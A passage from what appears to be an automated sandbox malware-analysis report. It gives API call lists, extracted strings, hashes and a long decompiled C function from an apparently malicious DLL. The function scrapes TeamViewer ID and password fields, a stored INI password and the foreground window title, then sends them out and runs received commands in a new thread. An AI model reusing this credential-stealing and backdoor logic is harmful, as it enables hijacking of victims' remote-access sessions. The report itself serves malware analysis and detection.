                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339501
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A4DF18), ref: 6F33950E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339511
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A56118), ref: 6F33951E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339521
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A53E68), ref: 6F33952E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339531
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A32C28), ref: 6F33953E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339541
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A563B0), ref: 6F33954E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339551
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A56660), ref: 6F33955E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339561
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A59868), ref: 6F33956E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339571
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A55C48), ref: 6F33957E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339581
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A45A70), ref: 6F33958E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F339591
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00A32D38), ref: 6F33959E
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3395A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$Free$Path$AllocBackslashFile$DirectoryExitModule$AttributesCallsCurrentDisableFolderHandleLibraryMemoryMoveNameRemoveSpecSpecialSystemThreadwsprintf
                                                                                                                        • String ID: %s%s$%s%s%s$.ini$.odt$15.0.$8?x$PBx$TeamViewer$\dx$ar.j$gd$h2$pass$pg$s$t$tx$word
                                                                                                                        • API String ID: 566710939-4171022235
                                                                                                                        • Opcode ID: d63580a75c88fa6ac627a272023eaffc7104a4d4b56db290055da347d7890f37
                                                                                                                        • Instruction ID: f999455c21c1daccb96a09235b66c358848c5818597b540dc9325df1b255b9fb
                                                                                                                        • Opcode Fuzzy Hash: d63580a75c88fa6ac627a272023eaffc7104a4d4b56db290055da347d7890f37
                                                                                                                        • Instruction Fuzzy Hash: 6BA2AEF2A08794AFDB20EF64CC84A9BBBEDEB95320F00591DF59997240DB349454CF62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00511D6F, Relevance: 136.2, APIs: 48, Strings: 29, Instructions: 1456networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00511D91
                                                                                                                        • _memset.LIBCMT ref: 00511DC6
                                                                                                                        • _memset.LIBCMT ref: 00511DD2
                                                                                                                        • socket.WS2_32(00000002,?,00000000), ref: 00511DE0
                                                                                                                        • WSAGetLastError.WS2_32 ref: 00511DF1
                                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,0044D275,00747890,00000000,?,00000000), ref: 004A18C0
                                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        • htonl.WS2_32(00000000), ref: 00511ED5
                                                                                                                        • htons.WS2_32(?), ref: 00511EF0
                                                                                                                        • WSAGetLastError.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 00511F27
                                                                                                                        Strings
                                                                                                                        • nsSocklist.Listening.Port.is.not.valid m_Port=, xrefs: 00512E71
                                                                                                                        • ncSocklist.Socket.TimedOut.With.No.Action: , xrefs: 00512D9E
                                                                                                                        • SockList.IncomingDenied.HTTP NoOfRejects: , xrefs: 00512702
                                                                                                                        • SocketListener.startListening: socket failed with error , xrefs: 00511E08
                                                                                                                        • ncSocklist.Error.On.select: , xrefs: 005124AB
                                                                                                                        • StartWT.Listening P=, xrefs: 005120E6
                                                                                                                        • SockList.InvalidUDP, xrefs: 00513253
                                                                                                                        • ?s=00000000, xrefs: 00512AC0
                                                                                                                        • SocketListener.startListening: bind failed on port , xrefs: 00512032
                                                                                                                        • GET , xrefs: 00512A85
                                                                                                                        • nsSocklist.Error.On.accept: , xrefs: 00512819
                                                                                                                        • SocketListener.startListening: bad arguments, xrefs: 005132A4
                                                                                                                        • ncSocklist.Error.reading.from.socket: , xrefs: 0051295A
                                                                                                                        • ncSocklist.Wrong.Data.on.Port.80: , xrefs: 00512CD2
                                                                                                                        • StartWT.Bind.FinalFailure P=, xrefs: 00512224
                                                                                                                        • ncSocklist.Already.gracefully.closed.socket: , xrefs: 00512A1F
                                                                                                                        • POST , xrefs: 00512A9F
                                                                                                                        • Not logged Errors:, xrefs: 0051247F
                                                                                                                        • ?s=, xrefs: 00512ADB
                                                                                                                        • NoOfAccepts: , xrefs: 005126DA
                                                                                                                        • StartWT.PortInUse P=, xrefs: 0051229A
                                                                                                                        • 127.0.0.1, xrefs: 00511EDD
                                                                                                                        • ncSocklist.No.ConnectionThread.for.SessionID: , xrefs: 00512C49
                                                                                                                        • Error: , xrefs: 0051292B
                                                                                                                        • SocketListener.startListening: setsockopt(SO_BROADCAST) failed with error , xrefs: 00513108
                                                                                                                        • SockList.IncomingDenied.TCP, xrefs: 00512EF0
                                                                                                                        • SocketListener.startListening: listen failed with error , xrefs: 005121C0, 00512F55
                                                                                                                        • with error , xrefs: 00512008
                                                                                                                        • SocketListener.startListening: setsockopt(SO_REUSEADDR) failed with error , xrefs: 00511F42
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$ErrorInitializeLast_memset$DeleteH_prolog3_H_prolog3_catch_swprintfhtonlhtonssocket
                                                                                                                        • String ID: Error: $ NoOfAccepts: $ Not logged Errors:$ with error $127.0.0.1$?s=$?s=00000000$GET $POST $SockList.IncomingDenied.HTTP NoOfRejects: $SockList.IncomingDenied.TCP$SockList.InvalidUDP$SocketListener.startListening: bad arguments$SocketListener.startListening: bind failed on port $SocketListener.startListening: listen failed with error $SocketListener.startListening: setsockopt(SO_BROADCAST) failed with error $SocketListener.startListening: setsockopt(SO_REUSEADDR) failed with error $SocketListener.startListening: socket failed with error $StartWT.Bind.FinalFailure P=$StartWT.Listening P=$StartWT.PortInUse P=$ncSocklist.Already.gracefully.closed.socket: $ncSocklist.Error.On.select: $ncSocklist.Error.reading.from.socket: $ncSocklist.No.ConnectionThread.for.SessionID: $ncSocklist.Socket.TimedOut.With.No.Action: $ncSocklist.Wrong.Data.on.Port.80: $nsSocklist.Error.On.accept: $nsSocklist.Listening.Port.is.not.valid m_Port=
                                                                                                                        • API String ID: 1630412927-1562165143
                                                                                                                        • Opcode ID: 22f7dcfd0f83924f06e2f9e9cc3f7cb7301234f31577b636bec8c3132374d5b5
                                                                                                                        • Instruction ID: e6a55ac8a3c887517d54c0f1ee48ae6acae04ec2c4a80ba988411a6c71074ed7
                                                                                                                        • Opcode Fuzzy Hash: 22f7dcfd0f83924f06e2f9e9cc3f7cb7301234f31577b636bec8c3132374d5b5
                                                                                                                        • Instruction Fuzzy Hash: 3DD2E4B0C00248EEEF25EBA4CC85AEDBB78BF65304F14419DE14667191EB785F88CB25
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F336D50, Relevance: 125.0, APIs: 65, Strings: 6, Instructions: 765memorytimewindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 82%
                                                                                                                        			E6F336D50(intOrPtr _a8, char _a49, char _a50) {
				intOrPtr _v0;
				char _v3;
				short _v572;
				short _v580;
				short _v1092;
				char _v1364;
				char _v1372;
				char _v1864;
				short _v1872;
				short _v1884;
				char _v1896;
				char _v1900;
				struct HWND__* _v1908;
				char _v1912;
				void* _v1928;
				struct HWND__* _v1932;
				void* _v1936;
				struct tagMSG _v1964;
				char _v1972;
				struct _FILETIME _v1980;
				void* _v1984;
				struct HWND__* _v1988;
				struct HWND__* _v1992;
				struct HWND__* _v1996;
				struct HWND__* _v2000;
				void _v2004;
				void* _v2008;
				void* _v2020;
				void* _v2024;
				void* _v2028;
				char _v2032;
				void* _v2036;
				void* _v2040;
				signed short _v2044;
				signed int _v2048;
				void* _v2052;
				char _v2068;
				void* _v2072;
				char _v2074;
				char _v2076;
				signed int _v2084;
				char _v2088;
				long _v2092;
				char _v2094;
				char _v2096;
				intOrPtr _v2100;
				struct HWND__* _v2104;
				void* _v2120;
				int _v2124;
				void* _t244;
				signed int _t251;
				signed int _t252;
				char _t254;
				WCHAR* _t255;
				int _t262;
				int _t263;
				void* _t269;
				void* _t270;
				WCHAR* _t271;
				WCHAR* _t273;
				long _t274;
				char _t275;
				struct HWND__* _t276;
				char _t281;
				char _t284;
				void* _t288;
				CHAR* _t293;
				int _t294;
				char _t295;
				signed int _t296;
				int _t298;
				void* _t299;
				signed char _t302;
				signed int _t303;
				CHAR* _t314;
				signed int _t316;
				signed int _t317;
				void* _t322;
				intOrPtr _t324;
				void* _t329;
				void* _t334;
				char _t340;
				char _t344;
				long _t346;
				struct HWND__* _t370;
				char _t373;
				intOrPtr _t377;
				char _t379;
				void* _t380;
				signed int _t383;
				void* _t386;
				CHAR* _t395;
				struct HWND__* _t406;
				struct HWND__* _t407;
				signed int _t417;
				signed int _t422;
				signed short _t423;
				signed int _t424;
				CHAR* _t442;
				CHAR* _t443;
				CHAR* _t445;
				void* _t467;
				void* _t468;
				void* _t469;
				int _t470;
				void* _t471;
				struct HWND__* _t472;
				void* _t473;
				void* _t474;
				void _t475;
				intOrPtr* _t476;
				void* _t477;
				CHAR* _t478;
				void* _t479;
				void* _t481;
				void* _t486;
				signed short _t487;
				void* _t488;
				void* _t489;
				void* _t490;
				CHAR* _t492;
				char* _t493;
				char* _t494;
				void* _t495;
				signed int _t496;
				void* _t498;
				void* _t499;
				void* _t500;
				void* _t501;
				void* _t503;
				void* _t504;
				void* _t505;
				void* _t513;
				void* _t514;
				void* _t523;
				void* _t535;

				_t498 = (_t496 & 0xfffffff8) - 0x800;
				_push(0x14);
				_push( &_v1980);
				L6F33C2EE();
				_t370 = 0;
				_t244 = VirtualAlloc(0, 0x1000, 0x1000, 4); // executed
				_t481 = _t244;
				if(_t481 == 0) {
					L91:
					return 0;
				} else {
					_push(0x14);
					_push( &_v1864);
					L6F33C2EE();
					GetLocaleInfoW(0x400, 0x5a,  &_v1872, 9);
					CharLowerW( &_v1872);
					_push(0x9c);
					_push(0x6f3403a0);
					L6F33C2EE();
					_push( &_v2036);
					_push( &_v2032);
					_push( &_v2040);
					 *0x6f3403a0 = 0x9c;
					_v2040 = 0;
					_v2032 = 0;
					_v2036 = 0;
					L6F33C330();
					 *0x6f3403ac = _v2048 & 0x0000ffff;
					_t251 = M6F3404A8; // 0x6f240000
					 *0x6f3403a4 = _v2052;
					 *0x6f3403a8 = _v2044;
					 *0x6f34043a = 4;
					if(_t251 != 0) {
						_push(0x435a88);
						_push(1);
						_t417 =  &_v2032;
						_push(_t417);
						_push(_t251);
						_v2032 = 0x5e6f0892;
						_v2028 = 0;
						_v2024 = 0;
						_v2020 = 0;
						E6F331DB0();
						_t251 = _v2020;
						_t498 = _t498 + 0x10;
						if(_t251 != 0) {
							_v2072 = 0;
							_t251 =  *_t251(0, 0x65,  &_v2072); // executed
							if(_t251 == 0) {
								_t251 = _v2084;
								if(_t251 != 0) {
									_t251 =  *(_t251 + 0x10) & 0x00001000;
									 *0x6f34043a = _t417 & 0xffffff00 | _t251 == 0x00001000;
								}
							}
						}
					}
					_push(0x34);
					_push(_t481);
					L6F33C2EE();
					 *((intOrPtr*)(_t481 + 2)) = 0x832eb9b;
					 *((short*)(_t481 + 6)) = 0x102;
					 *((char*)(_t481 + 8)) = 1;
					_t422 = M6F3404E4; // 0x76958bd5
					 *((intOrPtr*)(_t481 + 0x18)) = _t422;
					_t513 = M6F34050C - _t370; // 0x1
					_v2092 = _t370;
					_t252 = _t251 & 0xffffff00 | _t513 != 0x00000000;
					 *(_t481 + 9) = _t252;
					_t377 =  *0x6f3403a4; // 0xa
					 *((intOrPtr*)(_t481 + 0x1c)) = _t377;
					_t423 =  *0x6f3403a8; // 0x0
					 *(_t481 + 0x20) = _t423;
					_t514 = M6F3404EC - _t370; // 0x1
					 *((char*)(_t481 + 0xa)) = _t252 & 0xffffff00 | _t514 != 0x00000000;
					 *((short*)(_t481 + 0x12)) =  *0x6f34043a & 0x000000ff;
					_t424 =  *0x6f3403ac; // 0x42ee
					 *(_t481 + 0x24) = _t424;
					_t254 = M6F340544; // 0x1
					 *((char*)(_t481 + 0xc)) = _t254;
					_t379 = M6F340548; // 0x1
					 *((char*)(_t481 + 0xb)) = _t379;
					 *(_t481 + 0xf) = _t370;
					 *((char*)(_t481 + 0x11)) = 0x17;
					_t255 = M6F3404F8; // 0xa56660
					_t467 = E6F33A2F0(_t255, 1,  &_v2092);
					_t499 = _t498 + 0xc;
					if(_t467 != _t370) {
						_t47 = _t481 + 0x34; // 0x34
						RtlMoveMemory(_t47, _t467, _v2092);
						HeapFree(GetProcessHeap(), _t370, _t467);
					}
					_t380 = M6F340504; // 0xa59868
					_v2092 = _t370;
					_t468 = E6F33A2F0(_t380, 1,  &_v2092);
					_t500 = _t499 + 0xc;
					if(_t468 != _t370) {
						_t53 =  &_a49; // 0x35
						RtlMoveMemory(_t481 + _t53, _t468, _v2092);
						HeapFree(GetProcessHeap(), _t370, _t468);
					}
					_t469 = _v2092 +  &_a50;
					_v2092 = _t370;
					_t486 = E6F33A2F0( &_v1900, 1,  &_v2092);
					_t501 = _t500 + 0xc;
					if(_t486 != _t370) {
						RtlMoveMemory(_t469 + _t481, _t486, _v2092);
						HeapFree(GetProcessHeap(), _t370, _t486);
					}
					_t487 = _t469 + _v2092 + 1;
					_v2044 = _t487;
					_t262 = SetTimer(_t370, _t370, _t370, _t370); // executed
					_t470 = _t262;
					_v2068 = 0x28;
					_v2052 = 1;
					_t263 = GetMessageA( &_v1964, _t370, _t370, _t370);
					if(_t263 == _t370) {
						L90:
						VirtualFree(_t481, _t370, 0x8000);
						goto L91;
					} else {
						L15:
						L15:
						if(_v2052 == _t370) {
							_t383 = _v1964.message;
						} else {
							_t383 = 0x113;
							_v2052 = _t370;
							_v1964.message = 0x113;
							_v1964.hwnd = _t370;
							_v1964.wParam = _t470;
						}
						if(_t263 == 0xffffffff || _t383 == 0x10) {
							goto L89;
						}
						if(_t383 == 0x113) {
							if(_v1964.hwnd != _t370) {
								L87:
								DispatchMessageA( &_v1964);
								_t263 = GetMessageA( &_v1964, _t370, _t370, _t370);
								if(_t263 != _t370) {
									_t487 = _v2048;
									goto L15;
								}
								goto L90;
							}
							L24:
							if(_t523 != 0) {
								goto L87;
							}
							KillTimer(_t370, _t470);
							E6F336A90( &_v2028, _t370);
							_t269 = M6F3404D8; // 0xa55cd8
							_t270 = E6F3338A0(_t269, _t370, _t370, 1);
							_push(0x1000 - _t487);
							_t471 = _t481 + _t487;
							_push(_t471);
							 *((char*)(_t481 + 0xe)) = _t383 & 0xffffff00 | _t270 != 0x00000000;
							L6F33C2EE();
							_t271 = M6F3404F8; // 0xa56660
							_t386 = M6F340504; // 0xa59868
							_v2104 = _t370;
							wsprintfW( &_v580, L"%s\\%s", _t386, _t271);
							_t273 = M6F3404D0; // 0xa58418
							_t503 = _t501 + 0x28;
							_t274 = GetPrivateProfileStringW(L"PWD",  &_v572, _t370,  &_v1092, 0x103, _t273); // executed
							if(_t274 != 0) {
								_t495 = E6F33A2F0( &_v1092, 1,  &_v2096);
								_t503 = _t503 + 0xc;
								if(_t495 != _t370) {
									RtlMoveMemory(_t471, _t495, _v2096);
									HeapFree(GetProcessHeap(), _t370, _t495);
								}
							}
							_t275 = _v2096;
							_v2092 = _t275 + _v2048 + 1;
							 *(_t481 + 0x30) = _t275;
							_t276 = GetForegroundWindow(); // executed
							_t472 = _t276;
							_v1884 = 0;
							if(_t472 != _t370) {
								GetWindowTextW(_t472,  &_v1884, 0x104);
							}
							_v2096 = _t370;
							_t488 = E6F33A2F0( &_v1884, 1,  &_v2096);
							_t504 = _t503 + 0xc;
							if(_t488 != _t370) {
								RtlMoveMemory(_t481 + _v2092, _t488, _v2096);
								HeapFree(GetProcessHeap(), _t370, _t488);
							}
							_t489 = _v2092 + _v2096 + 1;
							_v1884 = 0;
							_v2096 = _t370;
							if(_t472 != _t370) {
								_v2088 = _t370;
								GetWindowThreadProcessId(_t472,  &_v2088);
								_t344 = _v2088;
								if(_t344 > _t370) {
									_v1936 = _t344;
									asm("pxor xmm0, xmm0");
									_v2092 = _t370;
									_v1932 = _t370;
									_v1928 = 0x18;
									asm("movq [esp+0xd0], xmm0");
									asm("movq [esp+0xd8], xmm0");
									_v1908 = _t370;
									_t346 = NtOpenProcess( &_v2092, 0x410,  &_v1928,  &_v1936);
									if(_t346 >= 0) {
										_push(0x104);
										_push( &_v1896);
										_push(_t370);
										_push(_v2104);
										L6F33C38A();
										if(_t346 != 0) {
											_t479 = E6F33A2F0( &_v1912, 1,  &_v2124);
											_t504 = _t504 + 0xc;
											if(_t479 != _t370) {
												RtlMoveMemory(_t481 + _t489, _t479, _v2124);
												HeapFree(GetProcessHeap(), _t370, _t479);
											}
										}
										NtClose(_v2120);
									}
								}
							}
							_t281 = 0;
							_t473 = _v2096 +  &_v3;
							_v2092 = _t473;
							_v2096 = 0;
							_t535 =  *0x6f340398 - _t370; // 0x900c2
							if(_t535 == 0) {
								L54:
								_t474 = _t473 + _t281 + 1;
								_v2068 = 1;
								if(_t281 > 1) {
									_t406 =  *0x6f340398; // 0x900c2
									_t492 = _t474 + _t481;
									_t281 = GetDlgItemTextA(_t406, 0x4e83, _t492, 0xfff - _t474); // executed
									_v2096 = _t281;
									if(_t281 > _t370 &&  *_t481 == 0x2d) {
										_t281 = 0;
										_v2096 = 0;
										 *_t492 = 0;
										 *((char*)(_t474 + _t481 + 1)) = 0;
									}
								}
								_v1992 = _t370;
								_v1988 = _t370;
								_v2000 = _t370;
								_v1996 = _t370;
								_t475 = _t474 + _t281 + 1;
								_v2072 = _t370;
								 *(_t481 + 0x2c) = _t370;
								 *(_t481 + 0x28) = _t370;
								if(_v1964.message != 0x83fe) {
									L61:
									 *((char*)(_t481 + 0xd)) = 0;
									 *(_t481 + 0x14) = _t370;
									goto L62;
								} else {
									_t334 = _v1964.lParam;
									if(_t334 == _t370) {
										goto L61;
									}
									 *((char*)(_t481 + 0xd)) =  *((intOrPtr*)(_t334 + 0x10));
									 *(_t481 + 0x14) =  *(_t334 + 4);
									_v1992 =  *((intOrPtr*)(_t334 + 0x14));
									_v1988 =  *(_t334 + 0x18);
									_v2072 = _t334;
									 *(_t481 + 0x2c) =  *(_t334 + 0x18);
									L62:
									_push( &_v2088);
									_push( &_v2092);
									_v2092 = _t370;
									_v2088 = _t370;
									_v1980.dwHighDateTime = E6F3366E0();
									_t284 = _v2088;
									_push(1);
									_v1996 = _t284;
									_v2000 = _v2092;
									 *(_t481 + 0x28) = _t284;
									 *_t481 = _t475;
									E6F3353F0(_v2024, _v2028, _t481, _t475);
									_t287 = _v1992;
									_t505 = _t504 + 0x1c;
									_v2008 = _t481;
									_v2004 = _t475;
									if(_v1992 != _t370) {
										_push(1);
										E6F3353F0(_v2024, _v2028, _t287, _v1988);
										_t505 = _t505 + 0x14;
									}
									_push("k");
									_push( &_v2028);
									_t288 = E6F335690();
									_push(_t370);
									_t490 = _t288;
									E6F3353F0(_v2024, _v2028, _t481, _t475);
									_t501 = _t505 + 0x1c;
									if(_v1980.dwHighDateTime != _t370) {
										VirtualFree(_v2092, _t370, 0x8000); // executed
									}
									_v2088 = _t370;
									if(_t490 <= _t370) {
										L77:
										_push(8);
										_push( &_v1972);
										L6F33C2EE();
										GetSystemTimeAsFileTime( &_v1980);
										_v2052 = _v1980.dwLowDateTime;
										_v2048 = _v1980.dwHighDateTime;
										_v2092 = _t370;
										RtlTimeToSecondsSince1970( &_v2052,  &_v2092);
										_t395 = M6F3404CC; // 0xa32d38
										_t293 = M6F3404DC; // 0xa55ca8
										_v2096 = 0x6467;
										_v2094 = 0;
										_t294 = GetPrivateProfileIntA(_t293,  &_v2096, _t370, _t395);
										if(_t294 != _t370) {
											if(_t294 <= _v2100) {
												E6F336A90(_t370, _t370);
												_t501 = _t501 + 8;
											}
										} else {
											_t302 = _v2028;
											_t303 = _t302 & 0x000000ff;
											if(_t302 == 0) {
												_t303 = 1;
											}
											wsprintfA( &_v1372, "%lu", _t303 * 0xe10 + _v2100);
											_t442 = M6F3404CC; // 0xa32d38
											_t501 = _t501 + 0xc;
											_t443 = M6F3404DC; // 0xa55ca8
											WritePrivateProfileStringA(_t443,  &_v2088,  &_v1364, _t442);
										}
										goto L83;
									} else {
										if(_t490 >= 0x12) {
											_push(_t370);
											E6F3353F0(_v2024, _v2028, _v1984, _t490);
											_t476 = _v1984;
											_t501 = _t501 + 0x14;
											if( *_t476 == 0x832eb9b) {
												_t314 = M6F3404CC; // 0xa32d38
												_t445 = M6F3404DC; // 0xa55ca8
												_v2088 = 1;
												_v2076 = 0x6467;
												_v2074 = 0;
												WritePrivateProfileStringA(_t445,  &_v2076, _t370, _t314); // executed
												_t316 =  *(_t476 + 4) & 0x0000ffff;
												 *0x6f340000 = _t316;
												if(_t316 < 0xa) {
													 *0x6f340000 = 0x3c;
												}
												_t317 =  *(_t476 + 0xc) & 0x0000ffff;
												if(_t317 <= _t370) {
													_push(_t370);
													_push(_t370);
													_push(_t370);
													_push(_t370);
												} else {
													_push( *(_t476 + 0xa) & 0x000000ff);
													_t329 = _v1984;
													_push( *(_t476 + 0xb) & 0x000000ff);
													_push(_t317 + _t329 + 0x13);
													_push(_t329 + 0x12);
												}
												E6F3369C0();
												_t501 = _t501 + 0x10;
												if( *((intOrPtr*)(_t476 + 0x10)) > _t370) {
													_t322 = HeapAlloc(GetProcessHeap(), 8, 0x1c);
													_v0 =  *((intOrPtr*)(_t476 + 6));
													_t477 = E6F33A360(( *(_t476 + 0xc) & 0x0000ffff) + _v1984 + ( *(_t476 + 0xe) & 0x0000ffff) + 0x14, 1, 0);
													_t324 = E6F33A2F0(_t477, 0, 0);
													_t501 = _t501 + 0x18;
													_a8 = _t324;
													HeapFree(GetProcessHeap(), 0, _t477);
													CloseHandle(CreateThread(0, 0, E6F335B40, _t322, 0, 0));
													Sleep(0x1f4);
													_t370 = 0;
												}
											}
										}
										HeapFree(GetProcessHeap(), _t370, _v1984);
										if(_v2088 != _t370) {
											L83:
											_t295 = _v2088;
											if(_t295 != _t370) {
												_t299 =  *_t295;
												if(_t299 != _t370) {
													SetEvent(_t299);
												}
											}
											_t296 =  *0x6f340000; // 0x3c
											_t298 = SetTimer(_t370, _t370, _t296 * 0x3e8, _t370); // executed
											_t470 = _t298;
											goto L87;
										} else {
											goto L77;
										}
									}
								}
							} else {
								_t493 = 0;
								if(_v2068 <= _t370) {
									goto L54;
								}
								_v2072 = 0xfff - _t473;
								_t478 = _t473 + _t481;
								L42:
								L42:
								if(_t493 > 0) {
									Sleep(0x1f4); // executed
								}
								_t407 =  *0x6f340398; // 0x900c2
								_t340 = GetDlgItemTextA(_t407, 0x4e82, _t478, _v2072); // executed
								_t373 = _t340;
								if( *_t481 == 0x2d || _t373 < 0xb) {
									goto L46;
								}
								_t494 = 0;
								if(_t373 <= 0) {
									L52:
									_t281 = _t373;
									_v2096 = _t281;
									L53:
									_t473 = _v2092;
									_t370 = 0;
									goto L54;
								} else {
									goto L49;
								}
								do {
									L49:
									if(StrTrimA( &(_t478[_t494]), " ") != 0) {
										_t373 = _t373 - 1;
									}
									_t494 =  &_v3;
								} while (_t494 < _t373);
								goto L52;
								L46:
								_t281 = 0;
								_t493 =  &_v3;
								_v2096 = 0;
								 *_t478 = 0;
								if(_t493 < _v2068) {
									goto L42;
								}
								goto L53;
							}
						}
						_t523 = _t383 - 0x83fe;
						goto L24;
						L89:
						KillTimer(_t370, _t470);
						goto L90;
					}
				}
			}











































































































































                                                                                                                        0x6f336d56
                                                                                                                        0x6f336d60
                                                                                                                        0x6f336d66
                                                                                                                        0x6f336d67
                                                                                                                        0x6f336d78
                                                                                                                        0x6f336d7b
                                                                                                                        0x6f336d81
                                                                                                                        0x6f336d85
                                                                                                                        0x6f33777c
                                                                                                                        0x6f337785
                                                                                                                        0x6f336d8b
                                                                                                                        0x6f336d8b
                                                                                                                        0x6f336d94
                                                                                                                        0x6f336d95
                                                                                                                        0x6f336dab
                                                                                                                        0x6f336db9
                                                                                                                        0x6f336dbf
                                                                                                                        0x6f336dc4
                                                                                                                        0x6f336dc9
                                                                                                                        0x6f336dd2
                                                                                                                        0x6f336dd7
                                                                                                                        0x6f336ddc
                                                                                                                        0x6f336ddd
                                                                                                                        0x6f336de7
                                                                                                                        0x6f336deb
                                                                                                                        0x6f336def
                                                                                                                        0x6f336df3
                                                                                                                        0x6f336e05
                                                                                                                        0x6f336e0a
                                                                                                                        0x6f336e0f
                                                                                                                        0x6f336e15
                                                                                                                        0x6f336e1b
                                                                                                                        0x6f336e24
                                                                                                                        0x6f336e26
                                                                                                                        0x6f336e2b
                                                                                                                        0x6f336e2d
                                                                                                                        0x6f336e31
                                                                                                                        0x6f336e32
                                                                                                                        0x6f336e33
                                                                                                                        0x6f336e3b
                                                                                                                        0x6f336e3f
                                                                                                                        0x6f336e43
                                                                                                                        0x6f336e47
                                                                                                                        0x6f336e4c
                                                                                                                        0x6f336e50
                                                                                                                        0x6f336e55
                                                                                                                        0x6f336e5f
                                                                                                                        0x6f336e63
                                                                                                                        0x6f336e67
                                                                                                                        0x6f336e69
                                                                                                                        0x6f336e6f
                                                                                                                        0x6f336e74
                                                                                                                        0x6f336e81
                                                                                                                        0x6f336e81
                                                                                                                        0x6f336e6f
                                                                                                                        0x6f336e67
                                                                                                                        0x6f336e55
                                                                                                                        0x6f336e87
                                                                                                                        0x6f336e89
                                                                                                                        0x6f336e8a
                                                                                                                        0x6f336e8f
                                                                                                                        0x6f336e96
                                                                                                                        0x6f336e9c
                                                                                                                        0x6f336ea0
                                                                                                                        0x6f336ea6
                                                                                                                        0x6f336ea9
                                                                                                                        0x6f336eaf
                                                                                                                        0x6f336eb3
                                                                                                                        0x6f336eb6
                                                                                                                        0x6f336eb9
                                                                                                                        0x6f336ebf
                                                                                                                        0x6f336ec2
                                                                                                                        0x6f336ec8
                                                                                                                        0x6f336ecb
                                                                                                                        0x6f336ed4
